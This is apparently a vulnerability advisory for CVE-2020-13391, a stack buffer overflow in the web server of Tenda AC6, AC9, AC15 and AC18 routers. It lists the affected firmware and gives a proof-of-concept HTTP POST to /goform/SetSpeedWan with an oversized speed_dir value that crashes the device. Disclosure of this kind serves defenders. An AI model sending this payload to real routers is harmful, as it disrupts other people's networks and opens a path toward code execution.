CVE-2020-13391: Tenda Vulnerability

Vendor of the products:  Tenda 

Reported by:       Joel

CVE-2020-13391    CVE_details

Affected products:  

1
2
3
4
5
AC9 V1.0 V15.03.05.19(6318)_CN
AC9 V3.0 V15.03.06.42_multi
AC15 V1.0 V15.03.05.19_multi_TD01
AC18 V15.03.05.19(6318_)_CN
AC6 V1.0 V15.03.05.19_multi_TD01

Overview

An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318), AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multi_TD01, AC18 V15.03.05.19(6318) devices. There is a buffer overflow vulnerability in the router’s web server – httpd. While processing the speed_dir parameter for a post request, the value is directly used in a sprintf to a local variable placed on the stack, which overrides the return address of the function. The attackers can construct a payload to carry out arbitrary code attacks.

POC

This PoC can result in a Dos.

Given the vendor’s security, we only provide parts of the HTTP.

1
2
3
4
5
6
7
8
9
10
11
12
POST /goform/SetSpeedWan HTTP/1.1
Host: 192.168.18.131
Accept:  */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Cookie: password=jgi5gk

speed_dir=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

Details

ARM

MIPS